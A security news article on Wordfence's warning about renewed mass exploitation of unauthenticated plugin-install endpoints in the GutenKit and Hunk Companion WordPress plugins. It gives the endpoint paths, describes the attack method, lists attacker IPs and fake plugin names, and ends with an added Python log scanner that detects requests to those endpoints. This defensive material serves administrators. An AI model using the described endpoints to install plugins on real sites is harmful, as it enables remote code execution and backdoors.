The Wordfence Threat Intelligence team has issued a new warning about the resurgence of large-scale attacks exploiting three critical WordPress plugin vulnerabilities — CVE-2024-9234, CVE-2024-9707, and CVE-2024-11972 — in the GutenKit and Hunk Companion plugins. These flaws, each carrying a CVSS score of 9.8, allow unauthenticated attackers to install and activate arbitrary plugins, potentially leading to remote code execution (RCE).
“Our records indicate that attackers most recently started mass exploiting the issues again on October 8th, 2025, approximately one year later,” Wordfence reported. “The Wordfence Firewall has already blocked over 8,755,000 exploit attempts targeting these vulnerabilities.”
The vulnerabilities affect:
- GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor (40,000+ active installs)
- Hunk Companion (8,000+ active installs)
Both plugins contain insecure REST API endpoints that lack proper capability checks, allowing anyone with network access to install and activate arbitrary plugins, including malicious ones designed to upload files, drop backdoors, or execute arbitrary PHP code.
“Unfortunately, the permission check for this REST API endpoint registration is set to true. This means that this REST API endpoint is publicly accessible,” Wordfence explained. “Unauthenticated attackers can invoke the REST API endpoint and install plugins from remote sources and achieve remote code execution.”
In the case of GutenKit (CVE-2024-9234), the vulnerable endpoint /wp-json/gutenkit/v1/install-active-plugin uses the function install_and_activate_plugin_from_external() without any authentication controls. Attackers simply send a POST request to this endpoint with a link to a malicious ZIP file, such as:
This file, hosted on GitHub, contains heavily obfuscated PHP scripts disguised as legitimate WordPress plugins.
Wordfence analysis found that one of the malicious files, vv.php, starts with a valid PDF header but contains malicious PHP code which executes several function calls including string reversals, decompression, and payload conversion.
When decoded, it reveals a remote terminal, defacement toolkit, and network-sniffing capabilities.
The Hunk Companion plugin (CVE-2024-9707 and CVE-2024-11972) suffers from a nearly identical issue via the /wp-json/hc/v1/themehunk-import endpoint, where the permission callback is also set to __return_true. This allows unauthenticated plugin installations, which can subsequently lead to remote code execution when chained with other vulnerable plugins.
Wordfence has observed millions of exploit attempts targeting these endpoints, with the latest surge occurring in early October 2025. The attackers appear to be leveraging a botnet composed of compromised servers and cloud instances to automate exploitation across vulnerable WordPress sites worldwide.
Top Offending IP Addresses:
- 13.218.47.110 — over 82,900 blocked requests
- 3.10.141.23 — over 82,400 blocked requests
- 52.56.47.51 — over 81,100 blocked requests
- 18.219.237.98 — over 75,600 blocked requests
- 3.141.28.47 — over 349,900 requests (targeting Hunk Companion specifically)
Attackers are also attempting to install known vulnerable plugins such as wp-query-console, which itself has an unpatched RCE flaw, to chain exploits for persistence and privilege escalation.
“Having several backdoors is better than having one,” Wordfence warned. “Additionally, these file managers can be used to upload further malware.”
The malicious plugins dropped by these attacks often include multiple backdoors and file management utilities, enabling attackers to:
- Upload or delete files from the WordPress directory
- Change file permissions and ownership
- Exfiltrate site data
- Deploy additional web shells or payloads
Wordfence also discovered fake plugin names such as:
- background-image-cropper
- ultra-seo-processor-wp
- oke
- up
Each is a malicious ZIP containing obfuscated file uploaders and command-execution tools.
Wordfence strongly urges all WordPress administrators using these plugins to update immediately:
- GutenKit ≥ 2.1.1
- Hunk Companion ≥ 1.9.0
Administrators should also:
- Review /wp-content/plugins/ and /wp-content/upgrade/ for unknown directories
- Inspect access logs for suspicious requests to:
  - /wp-json/gutenkit/v1/install-active-plugin
  - /wp-json/hc/v1/themehunk-import
- Block repeated requests from the malicious IPs listed in the Wordfence advisory.
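The log review step above can be scripted. The following is an added example (not Wordfence's or either plugin's code) that scans Apache/nginx combined-format access logs for requests to the two endpoints named in the advisory, counts them per source IP, and separates out the ones that returned a 2xx status, since those are the attempts most likely to have actually installed something. It also recognises the equivalent `?rest_route=` form that WordPress accepts when pretty permalinks are disabled; the log lines and IP addresses are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Endpoint paths as given in the Wordfence advisory.
WATCHED_ENDPOINTS = (
    "/wp-json/gutenkit/v1/install-active-plugin",
    "/wp-json/hc/v1/themehunk-import",
)

# Combined log format: ip ident user [time] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample log (documentation IP ranges, not real attackers).
SAMPLE_LOG = """\
203.0.113.7 - - [08/Oct/2025:10:12:01 +0000] "POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Oct/2025:10:12:03 +0000] "POST /wp-json/hc/v1/themehunk-import/ HTTP/1.1" 403 0 "-" "python-requests/2.31"
198.51.100.4 - - [08/Oct/2025:10:13:40 +0000] "POST /?rest_route=%2Fhc%2Fv1%2Fthemehunk-import HTTP/1.1" 200 310 "-" "curl/8.0"
198.51.100.4 - - [08/Oct/2025:10:13:41 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 9000 "-" "curl/8.0"
garbage line that does not parse
"""

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_watched_request(entry):
    """True when the request path resolves to one of the watched REST endpoints.
    Handles the /?rest_route=/hc/v1/... form, URL encoding, query strings and trailing slashes."""
    path = entry["path"]
    if "rest_route=" in path:
        route = path.split("rest_route=", 1)[1].split("&", 1)[0]
        path = "/wp-json" + unquote(route)
    path = path.split("?", 1)[0].rstrip("/")
    return path in WATCHED_ENDPOINTS

def scan(lines):
    """Return (per_ip_counts, successful): hits per source IP, and (ip, path, status)
    for hits that got a 2xx response, which warrant checking /wp-content/plugins/ first."""
    per_ip, successful = Counter(), []
    for line in lines:
        e = parse_line(line)
        if e and is_watched_request(e):
            per_ip[e["ip"]] += 1
            if e["status"].startswith("2"):
                successful.append((e["ip"], e["path"], e["status"]))
    return per_ip, successful

if __name__ == "__main__":
    counts, hits = scan(SAMPLE_LOG.splitlines())
    print(counts.most_common(), hits)
```

Run it against a real log with `scan(open("access.log"))`; a 403 from the firewall means the attempt was blocked, while a 200 means the plugin directory should be reviewed for the fake plugin names listed above.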